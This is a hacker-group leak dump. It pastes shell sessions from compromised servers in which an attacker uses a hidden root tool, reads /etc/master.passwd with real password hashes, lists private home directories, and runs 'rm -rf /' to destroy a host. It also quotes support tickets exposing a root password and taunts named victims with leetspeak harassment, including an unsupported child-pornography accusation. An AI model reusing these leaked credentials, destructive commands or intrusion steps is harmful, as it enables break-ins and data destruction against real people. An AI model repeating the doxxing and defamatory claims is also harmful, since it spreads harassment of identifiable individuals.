/.h1dd3nw4r3z/h00ps rdx sh-2.05b$ id uid=1019(rdx) gid=1020(rdx) groups=1020(rdx) sh-2.05b$ ls -al /home/rdx total 5368 drwx--x--x 22 rdx rdx 1536 Dec 12 22:02 . drwx--x--x 21 root wheel 512 Dec 10 01:52 .. drwx------ 6 rdx rdx 512 Jun 7 2005 .BitTornado drwx------ 3 rdx rdx 512 Jun 7 2005 .BitchX -rw-r--r-- 1 rdx rdx 1240 Aug 11 04:40 .addon-installlog -rw------- 1 rdx rdx 0 Aug 11 04:41 .addonscgi-MamboOpenSource -rw------- 1 rdx rdx 0 Apr 17 2005 .addonscgi-PhpWiki -rw------- 1 rdx rdx 0 Apr 17 2005 .addonscgi-PostNuke -rw------- 1 rdx rdx 21 Apr 15 2005 .addonscgi-Xoops -rw------- 1 rdx rdx 22 Aug 13 22:36 .addonscgi-e107 -rw-r--r-- 1 rdx rdx 5568 Dec 10 06:01 .bash_history -rw------- 1 rdx rdx 14 Aug 19 07:34 .contactemail drwx------ 2 rdx rdx 512 Dec 10 01:51 .cpanel-datastore -rw------- 1 rdx rdx 100469 Oct 15 01:03 .cpanel-ducache -rw------- 1 rdx rdx 15 Oct 19 02:48 .cpanel-logs drwxr-xr-x 2 rdx rdx 512 Jun 7 2005 .entropybanner drwx------ 2 rdx rdx 512 Aug 13 20:42 .gnupg drwxr-xr-x 6 rdx rdx 512 Oct 19 02:48 .htpasswds -rw------- 1 rdx rdx 13 Dec 11 06:26 .lastlogin -rw-r--r-- 1 rdx rdx 36 Aug 13 20:49 .mailboxlist drwx------ 3 rdx rdx 512 Jun 7 2005 .neomail drwx------ 3 rdx rdx 512 Aug 29 23:07 .neomail-di0ad drwx------ 3 rdx rdx 512 Aug 9 04:59 .neomail-diesl0w drwx------ 2 rdx rdx 512 Dec 12 22:02 .spamassassin -rw-r--r-- 1 rdx rdx 0 Aug 13 21:23 .spamassassinboxenable -rw-r--r-- 1 rdx rdx 0 Aug 13 21:22 .spamassassinenable -rw------- 1 rdx rdx 24 Sep 26 2004 .spamkey drwx------ 2 rdx rdx 512 Aug 13 20:49 .sqmaildata drwx------ 2 rdx rdx 512 Jun 7 2005 .ssh drwxr-xr-x 5 rdx rdx 1024 Jun 7 2005 BitTorrent-4.0.1 -rw-r--r-- 1 rdx rdx 154427 Mar 25 2005 BitTorrent-4.0.1.tar.gz -rw-r--r-- 1 rdx nobody 2191926 Dec 10 01:59 The_Shellcoders_Handbook.chm drwxr-x--- 19 rdx rdx 512 Aug 1 02:10 backup-8.1.2005_02-05-10_rdx -rw-r--r-- 1 rdx rdx 1537 Apr 14 2003 btcompletedir.py -rw-r--r-- 1 rdx rdx 9163 Apr 14 2003 btcompletedirgui.py -rw-r--r-- 1 rdx rdx 4728 Apr 13 2003 btmakemetafile.py -rw-r--r-- 1 rdx rdx 5984 Apr 12 2005 btmakemetafile.pyc drwxr-xr-x 4 rdx mail 512 Dec 10 01:55 etc -rw-r--r-- 1 rdx rdx 561 May 3 2005 htaccess.txt -rw-r--r-- 1 rdx rdx 18080 Aug 9 02:35 logo2.png drwx------ 2 rdx rdx 512 Nov 30 00:17 logs drwxrwx--- 4 rdx mail 512 Dec 12 22:02 mail -rw-r--r-- 1 rdx rdx 6244 Sep 1 2003 maketorrent-1.2-src.zip -rw-r--r-- 1 rdx rdx 1317 Apr 14 2003 maketorrent.nsi -rw-r--r-- 1 rdx rdx 189 Apr 12 2005 playlist.txt drwxr-xr-x 3 rdx rdx 512 Jun 7 2005 public_ftp drwxr-x--- 12 rdx nobody 1024 Dec 10 01:52 public_html -rw-r--r-- 1 rdx rdx 148729 May 5 2005 ss.tgz drwx------ 7 rdx rdx 1024 Sep 22 17:54 tmp -rw-r--r-- 1 rdx rdx 9 May 22 2005 unf.c -rw-r--r-- 1 rdx rdx 198 Apr 12 2003 wincompletedirsetup.py lrwxr-xr-x 1 rdx rdx 11 Aug 6 21:19 www -> public_html sh-2.05b$ cat /home/rdx/.ssh/known_hosts localhost ssh-dss AAAAB3NzaC1kc3MAAACBAMdGVIur4giy/GE66xRweySWOYfVenkc02x7BFSjFTVHIYN4Xedp31YQ/Fe3OaPFHrEw9/ybKJmCvR7vl0fpzYEk6+s8obvZmKoww48kWBCTA2eAb2B1+OlEVZmzGFRKNW6Xb3anrBZZe3SC27yfdUIBALFJKIQjbxPntT3Vnb71AAAAFQCUvaF/gvKICWVcviHn2SUeEhcxHQAAAIAi39dT9vaJndQJtboXEFZVgdkaTYmylCjY69U1ywEwTd7V1ONINmHH/qHUzDONqEWl+l77y4tbJysMWp2Xz3I0/CtAA5M4yF541GJM8VyJv20L9vJnC+WHDvT7OeNlDYsj2TW8tjTtrc4tEZJpWm3syC4hcjgjLqQBS6VqO+oJ4wAAAIAZ6KGwxmJB1n9KxDMcqe8ckE9B9/a2b4jdY2Uq6pbyecLkcR5JPEQ+/klYsEWJW4q4Oo8bgo9IMtJPpxNGR/e68FkBUBXvrBAiIJmmop0RNpEEBP8+DgwXAYz8MWQQu7KHdfsruM+td8OxIEG2f+0BO0e6iQ6xza3CejrCkTOpjA== ftp.deepmagic.org ssh-dss AAAAB3NzaC1kc3MAAACBAMdGVIur4giy/GE66xRweySWOYfVenkc02x7BFSjFTVHIYN4Xedp31YQ/Fe3OaPFHrEw9/ybKJmCvR7vl0fpzYEk6+s8obvZmKoww48kWBCTA2eAb2B1+OlEVZmzGFRKNW6Xb3anrBZZe3SC27yfdUIBALFJKIQjbxPntT3Vnb71AAAAFQCUvaF/gvKICWVcviHn2SUeEhcxHQAAAIAi39dT9vaJndQJtboXEFZVgdkaTYmylCjY69U1ywEwTd7V1ONINmHH/qHUzDONqEWl+l77y4tbJysMWp2Xz3I0/CtAA5M4yF541GJM8VyJv20L9vJnC+WHDvT7OeNlDYsj2TW8tjTtrc4tEZJpWm3syC4hcjgjLqQBS6VqO+oJ4wAAAIAZ6KGwxmJB1n9KxDMcqe8ckE9B9/a2b4jdY2Uq6pbyecLkcR5JPEQ+/klYsEWJW4q4Oo8bgo9IMtJPpxNGR/e68FkBUBXvrBAiIJmmop0RNpEEBP8+DgwXAYz8MWQQu7KHdfsruM+td8OxIEG2f+0BO0e6iQ6xza3CejrCkTOpjA== 66.111.54.220 ssh-dss AAAAB3NzaC1kc3MAAAEBAPiiuWAyWzqgfkClgzjslJmVslnQsX10bAf2X2VdkS7rE9+w6bsVpuCQiMO2G2XxNcn0hjZlFN8TK35m48gjwy0nCpbFJ9F9dettokBcKye9Tr5giJsv9wzc7v0tT3A9J2fBJ6J0ZLeOjvNYk1o1nUwFlCE4EdvkQPq0RnV8Ftlab/y2M7uFJs8NMEnAkwrVpsVazpeNaZXNUE/Vv+lCh1J8N68+8O4wwdHcmXvuPtyRzwJk4Meu2yolf/0QpQrPisXxRdU7Q0hfjI98QE5gnDM1RqL7hNJcsFlZSovVl+f6qacNBgFDq2fNrzPp2HPISvbNs4QixZAeoApb7ifIaBMAAAAVAIvc80zhiF6KNbgkjojx+Y4ohnYlAAABAQCuVc74xoIaRg2QZvgvTeG/tFbuDy9Wsn3nEoghFwa8FQQH/EXMCbWUf/dSCeprk/Mx5o9E/5i9AXW3e67Nlp3/JtYSdkANXZkJjIvN5JQWxm+9srRmyopS2yesYlXpNRHIay/JFhN3MN6LiibBenfpcr9Zsnk6c/GIEAKzMdUNO4WA5FVFXD+VRVRFE69hdUOR2FzEHofHEBERbbpSdhQ8Rbcns8f+pJmKtu9wutW4xMVEqbzwWf6SkhjjJtydJzg5S7gyZMBUFIjuZj4yPUYutY/Qkv1MJPpWWDFgqQLZugiOTnAQMrPUnTIGUYMQLyBwlJhDDXDInZlSu3nU30hgAAABAHxlHSxixMRLOmtd2A5rCeViIDYdeH+bH8Sj0SoVPOLnAqZ/j2s4FWBvxLIJrNcxGEuquLGx8row3u1+UFCzR3WSe1YMO6NCr/DF9tGj40wA0cO9Dq6rJHKi33Z64lhhQ0kwZ0z8P8aBfy4lPKcQRNrwopB+MZE2WF08PkEfZQXcnTl59DsUqHH09J/OKxXU8OMGbGlIqF68UJrzSM1oXsxTIkJphINvNWGDeAdwCjtZKhOMvwlzHfv8CWRcvKtWOId+I3qGNHDLco6ylA5iQPwfQ434kP3qYvuN9Tqpq+01yM2KVobGJqTCi/fYt70UeNQhqxULvbndnJ+Jnzz+Pqw= sh-2.05b$ /.h1dd3nw4r3z/h00ps subz sh-2.05b$ id uid=1011(subz) gid=1012(subz) groups=1012(subz) sh-2.05b$ ls -al /home/subz total 97472 drwx--x--x 13 subz subz 512 Dec 9 22:14 . drwx--x--x 21 root wheel 512 Dec 10 01:52 .. drwx------ 3 subz subz 512 Jun 7 2005 .BitchX -rw-r--r-- 1 subz subz 5520 Nov 23 20:20 .bash_history -rw------- 1 subz subz 14 Aug 6 05:57 .contactemail drwx------ 2 subz subz 512 Oct 28 19:09 .cpanel-datastore -rw------- 1 subz subz 12 Oct 28 19:09 .lastlogin -rw------- 1 subz subz 24 Feb 27 2005 .spamkey drwx------ 2 subz subz 512 Jun 7 2005 .ssh drwxr-xr-x 4 subz subz 512 Jun 7 2005 .tmp drwxr-xr-x 2 subz subz 512 Jun 7 2005 blah -rwxr-xr-x 1 subz subz 2053659 Jan 2 2005 epic drwxr-x--- 4 subz mail 512 Jun 7 2005 etc -rw-r--r-- 1 subz subz 583 Jun 1 2005 htaccess.new drwxrwx--- 4 subz mail 512 Dec 9 22:14 mail -rwxr-xr-x 1 subz subz 20186 Nov 30 07:18 mix_nfo_backupAPR05.txt drwxr-xr-x 4 subz subz 512 Jun 7 2005 public_ftp drwxr-x--- 17 subz nobody 1024 Nov 23 20:20 public_html -rwxr-xr-x 1 subz subz 106 Apr 14 2005 runbx -rwxr-xr-x 1 subz subz 11 Apr 8 2005 s -rw-r--r-- 1 subz nobody 47694645 Nov 23 20:07 ta11-23-05.zip drwx------ 6 subz subz 1024 Aug 20 19:53 tmp lrwxr-xr-x 1 subz subz 11 Aug 3 18:11 www -> public_html drwxr-xr-x 2 subz subz 512 Jun 7 2005 x sh-2.05b$ cat /home/subz/.ssh/known_hosts xenin13.ath.cx ssh-dss AAAAB3NzaC1kc3MAAACBANG3OMhs6BTgTGNgezrI5hRX7U0aCdiCGWiN/L+QOlvAcokkAJvkEhbxOuc75yqDvc4grAkzftRDFYejnuPGnwe67Xx3MUyPRlY2ngReImDVb3Ntu2IofdgLB2za7jh9wpp8II6OV75VhyTptuDCKZfRmAQLRNXNMXbDaEoYmCuhAAAAFQD2IbUhcjvjTzs3Iv9po5qbt4DucQAAAIABgQtnRG8LRFMtwAUUYSwb7qG/ZhAYcAyvaTA0aEpzbaD5DuRJ2PYTgvgUiRY4lmZe1RmJagGFqSlFrxwDVUYNtq/quBTgGrakS7gZMqgfYmtErrbyiUuTNY3AT7Wcvsp0ylYM3a5MsNMZcWgldsx3lrQq+W1T6YtwWJ8bCdmZ3QAAAIEAz2MP2E1S8TLiKswE8mY+SrAYzxMTX9axeaianfCUg1yIapoU41pt6dGAWX7ZoxBTVBBxhH6g2GykRVVxW+4KnYv3tlKRPUfkxlGxc+RH9GoDTvKOkcGq5Pq4lRLV2eNn5mQZX4U8HzIS/zYLDbwjxtdp8VUo/8NfBDFc9HhLNE0= dtmf.org ssh-dss AAAAB3NzaC1kc3MAAACBANDIY+onj2bx5ldh4N+NIuqCGjbNHw//AyNXZoal18f1G6oj3sZaKDu4QcNrKH0FOL6UAgSTcQbV1PSuK6yXwNWd1OATogckOhv1XCiqjZtiT4xXXZUosu0RK+MeCa5Gvba6rm5eeLP2vxDgXsc/3Mswv+vHyJYc15+abG3PUn9/AAAAFQCqnQUtUuyBSZ2vQdT7h33zDFGCewAAAIEAiDl7c1v2/MtkzPSQrhWfSdPZQ53QjgcNbo6Z9mxf2VMjygY/ESIJjZm61KEpG9VjPTb8D/9n+aozrgx9nV44VtlbLa/NW8IXLjJ8iKhbLNNVBzOkXJthP4nrMPMJSwhLizj1U78gwcjXOWErMruJLFqyW8nZSsrhWNDq9XXWIXUAAACBAJv+pNHpae6MN8x0rqw06tq1v6U08VasriIIfL4o4xtBD2uJM3wzCLZQ9Ff5LKqpgVPnC4UK7Heocc/VKZ1UOeF+cdMAAKTCc7JtqzaPoduwuI1mfer4qRwsbIAgA7ZoTCO5tW239XXcZAKTi/1vpPx+azzcXdogX9xX29UxmeLC 66.153.28.11 ssh-dss AAAAB3NzaC1kc3MAAACBANG3OMhs6BTgTGNgezrI5hRX7U0aCdiCGWiN/L+QOlvAcokkAJvkEhbxOuc75yqDvc4grAkzftRDFYejnuPGnwe67Xx3MUyPRlY2ngReImDVb3Ntu2IofdgLB2za7jh9wpp8II6OV75VhyTptuDCKZfRmAQLRNXNMXbDaEoYmCuhAAAAFQD2IbUhcjvjTzs3Iv9po5qbt4DucQAAAIABgQtnRG8LRFMtwAUUYSwb7qG/ZhAYcAyvaTA0aEpzbaD5DuRJ2PYTgvgUiRY4lmZe1RmJagGFqSlFrxwDVUYNtq/quBTgGrakS7gZMqgfYmtErrbyiUuTNY3AT7Wcvsp0ylYM3a5MsNMZcWgldsx3lrQq+W1T6YtwWJ8bCdmZ3QAAAIEAz2MP2E1S8TLiKswE8mY+SrAYzxMTX9axeaianfCUg1yIapoU41pt6dGAWX7ZoxBTVBBxhH6g2GykRVVxW+4KnYv3tlKRPUfkxlGxc+RH9GoDTvKOkcGq5Pq4lRLV2eNn5mQZX4U8HzIS/zYLDbwjxtdp8VUo/8NfBDFc9HhLNE0= sh-2.05b$ /.h1dd3nw4r3z/h00ps root sh-2.05b$ cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:$1$JYAINdtj$UKfR4djpEuvg0cmcIzaX1/:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*LOCKED**:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin admin:$1$2e0zfCsz$lAQjvdjekuhSlsq8t6EW8/:1001:0::0:0:User &:/home/admin:/bin/sh mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin proftpd:*:1002:1001::0:0:User &:/home/proftpd:/bin/sh cpanel:*:1003:1004::0:0::/usr/local/cpanel:/usr/local/bin/bash ftp:*:1004:1005::0:0::/home/ftp:/usr/local/bin/bash mailman:*:1005:1006::0:0::/usr/local/cpanel/3rdparty/mailman:/usr/local/bin/bash jservers:$1$hIdAePQU$ksZM8EzbY7ChFz/7/U1Dh1:1007:1008::0:0:User &:/usr/home/jservers:/usr/local/cpanel/bin/jailshell scam:$1$Ang02Mgv$cKuTOfYcYWf6qHHswRwlH/:1009:1010::0:0:User &:/usr/home/scam:/usr/local/bin/bash rastack:$1$AhAoXm5W$9N5E3YEctK8ew/gfHdq6d0:1010:1011::0:0:User &:/usr/home/rastack:/usr/local/cpanel/bin/jailshell subz:$1$rcmDfNKD$uj2X1G9wRAyLcmXwcKNcu.:1011:1012::0:0:User &:/usr/home/subz:/usr/local/cpanel/bin/jailshell di0ad:$1$FrvNOHfO$IBXXix0r2Crs5YK9ewIbL/:1014:1015::0:0:Joe Bobba:/home/di0ad:/usr/local/bin/bash gonbeirc:$1$kW3TozN2$y56PFVfrSOoA45OOnJV1z1:1015:1016::0:0:User &:/usr/home/gonbeirc:/usr/local/bin/bash clamav:*LOCKED*P5FiQr94d85ls:1006:1007::0:0::/usr/local/clamav:/bin/false nemo9:$1$.Vr27464$dtbeVh8b7Hy/E2cOzzz6K0:1018:1019::0:0:User &:/usr/home/nemo9:/usr/local/cpanel/bin/noshell rdx:$1$6fj8JKdX$RGGah1KO/Nx.fY0w37Cle0:1019:1020::0:0:User &:/usr/home/rdx:/usr/local/cpanel/bin/jailshell currency:$1$HFXvkm.1$Gjb2L6gBhcL0JIMYRJ7yT0:1020:1021::0:0:User &:/usr/home/currency:/usr/local/cpanel/bin/jailshell w0ah:$1$tiDCS/51$BrkBishBD4mbEL6mPYOBJ0:1022:1023::0:0:User &:/usr/home/w0ah:/usr/local/cpanel/bin/noshell whoresr:$1$ovwvMAz1$S5I.MQD2S4DkTqolZlTEG1:1024:1025::0:0:User &:/usr/home/whoresr:/usr/local/cpanel/bin/jailshell krnlkrash:$1$1em0Vib5$VoKSjk4T8iLF7DEgQD.2w1:1025:1026::0:0:Doug Jones:/home/krnlkrash:/usr/local/bin/bash sh-2.05b$ ls -al /root total 429368 d-wx--x--x 19 root wheel 1024 Dec 12 03:28 . drwxr-xr-x 24 root wheel 1024 Aug 30 03:00 .. -rw------- 1 root wheel 957 Aug 14 00:30 .accesshash drwxr-xr-x 3 root wheel 512 Sep 15 03:04 .cpan drwxr-xr-x 3 root wheel 512 Aug 22 03:06 .cpanplus drwx------ 3 root wheel 512 Dec 12 03:24 .cpbsdpkgs drwx------ 3 root wheel 512 Dec 12 03:28 .cpcpan -rw-r--r-- 2 root wheel 801 May 1 2005 .cshrc -rw-r--r-- 1 root wheel 20 Aug 3 04:04 .forward drwx------ 2 root wheel 512 Dec 4 03:12 .gnupg -rw------- 1 root wheel 2538 Dec 10 06:01 .history drwx------ 2 root wheel 512 Aug 9 05:38 .john -rw-r--r-- 1 root wheel 143 May 1 2005 .k5login -rw-r--r-- 1 root wheel 293 May 1 2005 .login -rw------- 1 root wheel 40 Aug 3 17:13 .my.cnf -rw------- 1 root wheel 108 Aug 3 17:13 .mysql_history -rw-r--r-- 2 root wheel 251 May 1 2005 .profile -rw------- 1 root wheel 1024 Dec 12 03:31 .rnd drwx------ 2 root wheel 512 Dec 12 03:00 .spamassassin drwx------ 2 root wheel 512 Aug 2 19:52 .ssh -rw-r--r-- 1 root wheel 9971 Aug 2 18:24 CORE -rw-r--r-- 1 root wheel 1292 Aug 14 20:58 awstats.pl drwxr-xr-x 4 root wheel 512 Aug 2 21:43 cpanel3-skel drwx------ 4 root wheel 512 Aug 20 08:20 cprestore drwx--x--x 25 di0ad rastack 2048 Jun 10 2005 di0ad -rw-r--r-- 1 root wheel 80203532 Aug 2 20:32 di0ad.tgz -rw-r--r-- 1 root wheel 18401483 Aug 3 03:34 dirs.tgz drwxr-xr-x 28 root wheel 3584 Jun 10 2005 etc -rw-r--r-- 1 root wheel 345475 Aug 3 03:35 etc.tgz -rw-r--r-- 1 root wheel 30295 Aug 3 03:34 files.tgz drwxrwx--- 2 daemon 12 512 Aug 2 21:28 mail -rwxr-xr-x 1 root wheel 10785 Aug 7 23:39 metasploit-autoscan-plugin.tar.gz -rw-r--r-- 1 root wheel 0 Aug 3 17:06 mysqlaccess.log drwxr-xr-x 5 root wheel 512 Aug 17 06:57 ownage -r--r--r-- 1 root wheel 3893 Aug 2 03:13 ports-supfile drwxr-xr-x 15 root wheel 1024 Jun 10 2005 root -rw-r--r-- 1 root wheel 1173105 Aug 2 20:31 root.tgz -r--r--r-- 1 root wheel 3989 Aug 2 04:33 stable-supfile drwxr-xr-x 2 root wheel 512 Aug 9 05:37 test drwxr-xr-x 3 jservers clamav 512 Aug 14 15:19 unfz -rw-r--r-- 1 root wheel 119330992 Aug 2 20:34 unfz.tgz sh-2.05b$ ps. w1th 4ll th4t cr3d1t c4rd 1nf0 y0u g0t d0nt y0u th1nk y0u sh0uld p3rh4pz k33p y0ur r34l n4m3 0ut 0f y0ur m41l sp00lz? 3y3 kn0w 3ncrypt10n 1snt f0r 3l1t3 h4ck3rz l1k3 y0u & J3r3my. pps. y0u kn0w ph4s3d just h4ngz 4r0und y0u s0 y0u'll t4k3 th3 f4ll wh3n h3 g3tz bust3d.. but y0u'r3 t00 stud1d t0 s33 th4t. ppps. w3 d3c1d3d t0 h3lp y0u 0ut 4nd 3r4s3 th4t st0ld3n CC 1nf0rm4t10n fr0m y0ur b0x. n0 n33d t0 th4nk us.. sh-2.05b$ /.h1dd3nw4r3z/h00ps root sh-2.05b$ rm -rf / l0l@th1z fr0m h1z h0zt'z supp0rt s1t3.. -~-~-~ need new hard drive Created On:July 18, 2006 1:08am CDT Department:OS Reinstall Priority:High Posted by FDCservers Support (Staff) This helpdesk is only meant for reboots, reinstalls, hardware problems, reverse dns and connectivity issues only. FDCServers does not provide managed services at this time, unfortunately. We provide no support in configuration of any software packages. You may try our forums for support with this issue. -FDCservers -FDCservers Date: 07-18-2006 2:40pm CDT Posted by Paul ****** how do I mount the old hdd? Date: 07-18-2006 1:25pm CDT Posted by FDCservers Support (Staff) os reinstalled cpanel installing now admin / newbox root / newbox old drive hooked up as secondary. -fdc -FDCservers -~-~-~ th4nkz f0r th3 p4zz h3r3 1z 4n0th3r t1ck3t s00n 4ft3r th3 pr3v10uz 0n3. -~-~-~ reboot plz Created On:July 17, 2006 12:22am CDT Department:Reboot request Priority:High Posted by FDCservers Support (Staff) it looks like your hard drive is bad and needs to be replaced. please open a reinstall ticket letting us know what OS to install, and ask for a new drive. -FDCservers Date: 07-17-2006 12:46am CDT Posted by Paul ****** still offline :\ Date: 07-17-2006 12:41am CDT Posted by Paul ****** root/j4g3r6! Date: 07-17-2006 12:33am CDT Posted by FDCservers Support (Staff) Your server has been rebooted. Please wait 5-10 minutes for the server to come back up. Please reopen this ticket and provide login information for this server if it does not come back online. -~-~-~ th3 hdd w0rk3d juzt f1n3 dur1ng th3 rm -rf / I w0nder wh4t th3 pr0bl3m c0uld b3???! r u p1zz3d di0ad?? b3 gr4t3ful w3 d1dnt put y0ur d0rky m41lsp00lz w/ y0ur m0m 1n h3r3. h4r h4r h4r.sh3 s0undz l1k3 a r34l b1tch! y0ur f4m1ly 1z 1ns4n3 do0d!! 22.txt -~-~-~ 0wlm4n4tt r3s1gnz 0wlm4n 1z l4m3. h3 g0t 0wn3d b3c4uz3 h3 w4z 4 c0r3 m3mb3r 0f n1xs3c (fuck1ng l4m3). h3 m4k3z n30p3t-l1k3 g4m3z w1th h1z r3m3d14l php sk1llz. w3 h4v3 4 f33l1ng th1z l0z3r 3v3n suppl13z rl0xl3y w1th 4ll th3 ch1ld p0rn!$#%# 0wlm4n c0nt4ntly b1tch3z ab0ut sh1t 1n h1z ch4nn3l #n3twh0r3z (k3y = glucose). d0 n0t st3p 0n h1z t3rr1t0ry, h3'z a f3r0c10uz b34zt, 4nd w1ll 4tt3mpt t0 sk00l y0u 1n php kn0wl3dg3. h0w l4m3 1z th1z k1d 3xaktly? 0n 4 sk4l3 0f 1 t0 10 (1 b31ng th3 l3azt l4m3): 8. pr3tty fuck1n l4m3 1f y0u 4zk m3. wh4t k1nd 0f n4m3 1z 0wlm4n4tt 4nyw4yz? # ssh -l owlmanatt bell owlmanatt@bell's password: Last login: Wed Nov 30 00:57:14 2005 from localhost.localdomain Linux bell 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux OwlManAtt or a highly-trusted user! ^ --- h0h0h0 Please do not use this box and/or connection to violate any law. I will hunt your ass down and kick it if you do. ^ --- ./h0no-dd0z-b3ta98.9-v3rs10n89 -h fbi.gov owlmanatt@bell:~$ uname -a;id Linux bell 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux <-- 0h mY g0d g00d th1nG w3 st0l3 th0z3 k3rn3l 0dayz fR0M SD h0h0 uid=1000(owlmanatt) gid=1000(owlmanatt) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(lpadmin),108(scanner),109(admin),1000(owlmanatt) owlmanatt@bell:~$ w 17:37:26 up 1 day, 18:56, 1 user, load average: 1.35, 1.20, 1.11 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT owlmanat :0 - Tue22 ?xdm? 41:58m 1.52s x-session-manager <- th3 l4m3r 1z 3v3n 0n wh1le w3 h4xx0r h1m 101!! owlmanatt@bell:~$ ls -al /home/ total 76 drwxr-xr-x 7 root root 4096 Jul 18 18:47 . drwxr-xr-x 22 owlmanatt owlmanatt 4096 Nov 23 21:21 .. drwx------ 3 cvsd cvsd 4096 Jul 18 18:49 cvsd drwxr-xr-x 2 root root 49152 Sep 12 2004 lost+found drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 owlmanatt drwx------ 3 steve staff 4096 Jan 16 2005 scrap drwxr-xr-x 2 steve users 4096 May 20 2005 steve owlmanatt@bell:~$ ls -al /home/owlmanatt/* -rw-r--r-- 1 owlmanatt owlmanatt 162 Sep 14 20:51 /home/owlmanatt/101.php -rw-r--r-- 1 owlmanatt owlmanatt 24650585 Aug 4 19:07 /home/owlmanatt/3_Unix_geeks_harass_CS_Fag_(peeperz).mp3 -rw-r--r-- 1 owlmanatt owlmanatt 0 Jul 2 00:34 /home/owlmanatt/BLOCKCAM -rw-r--r-- 1 owlmanatt owlmanatt 2801668 Oct 28 21:05 /home/owlmanatt/Bon Jovi- You Give Love a Bad Name.mp3 -rw-r--r-- 1 owlmanatt owlmanatt 7415404 Mar 29 2005 /home/owlmanatt/CEDEGA-1.4.2.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 333230 Aug 10 08:04 /home/owlmanatt/Drivey013.exe -rw-r--r-- 1 owlmanatt owlmanatt 987981 Aug 29 21:55 /home/owlmanatt/Equipets_Mazipets.zip -rw-r--r-- 1 owlmanatt owlmanatt 44 Aug 27 17:21 /home/owlmanatt/HISTORIAN.txt -rw-r--r-- 1 owlmanatt owlmanatt 1377924 Sep 18 10:02 /home/owlmanatt/MT-3.2.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 312 Nov 19 22:59 /home/owlmanatt/MYSQL_PASSWORDS.txt -rw-r--r-- 1 owlmanatt owlmanatt 106 Sep 5 08:33 /home/owlmanatt/NO lrwxrwxrwx 1 owlmanatt owlmanatt 36 Mar 29 2005 /home/owlmanatt/TransGaming_Drive -> /home/owlmanatt/.transgaming/c_drive -rw-r--r-- 1 owlmanatt owlmanatt 15037045 Aug 22 20:32 /home/owlmanatt/WeHateTechEp13.mp3 -rw-r--r-- 1 owlmanatt owlmanatt 3082577 Oct 31 20:43 /home/owlmanatt/Wind's Nocturne.mp3 -rw-r--r-- 1 owlmanatt owlmanatt 3251 Nov 28 2004 /home/owlmanatt/about.php~ -rw-r--r-- 1 owlmanatt owlmanatt 1661 Nov 20 02:02 /home/owlmanatt/alexandria_sql.sql -rw-r--r-- 1 owlmanatt owlmanatt 15850 Nov 20 01:54 /home/owlmanatt/authors.sql -rw-r--r-- 1 owlmanatt owlmanatt 4956 Nov 19 23:48 /home/owlmanatt/authors_raw.csv -rw-r--r-- 1 owlmanatt owlmanatt 1956216 Oct 22 21:05 /home/owlmanatt/bash-2.05b.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 8801 Oct 29 15:43 /home/owlmanatt/career_paths.sql -rw-r--r-- 1 owlmanatt owlmanatt 341939 Nov 13 22:28 /home/owlmanatt/certificate_reverend.png -rw-r--r-- 1 owlmanatt owlmanatt 1006 Oct 21 20:42 /home/owlmanatt/checklist.yxy -rw-r--r-- 1 owlmanatt owlmanatt 393941 Aug 16 18:08 /home/owlmanatt/cj.tar.gz -rw-r--r-- 1 owlmanatt owlmanatt 18436 Oct 29 14:23 /home/owlmanatt/codes.txt -rw-r--r-- 1 owlmanatt owlmanatt 18423 Oct 29 14:55 /home/owlmanatt/country.sql -rw-r--r-- 1 owlmanatt owlmanatt 11054 Sep 5 23:26 /home/owlmanatt/cpvr.html -rw-r--r-- 1 owlmanatt owlmanatt 11054 Sep 5 23:26 /home/owlmanatt/cpvr.html~ -rw-r--r-- 1 owlmanatt owlmanatt 27042 Sep 5 23:21 /home/owlmanatt/cpvr_exposed.abw -rw-r--r-- 1 owlmanatt owlmanatt 8869 Sep 4 09:03 /home/owlmanatt/cpvr_exposed.html -rw-r--r-- 1 owlmanatt owlmanatt 10295 Sep 4 09:03 /home/owlmanatt/cpvr_exposed.html~ -rw-r--r-- 1 owlmanatt owlmanatt 65 Jul 28 23:42 /home/owlmanatt/cybit.pw -rw-r--r-- 1 owlmanatt owlmanatt 264 Sep 5 17:13 /home/owlmanatt/cybit_sql.txt -rw-r--r-- 1 owlmanatt owlmanatt 4344 Jul 14 23:59 /home/owlmanatt/cybitures.dia~ -rw-r--r-- 1 owlmanatt owlmanatt 2324955 Nov 24 10:20 /home/owlmanatt/database_backup.sql -rw-r--r-- 1 owlmanatt owlmanatt 103 Aug 14 20:40 /home/owlmanatt/emailaddress -rw-r--r-- 1 owlmanatt owlmanatt 22866 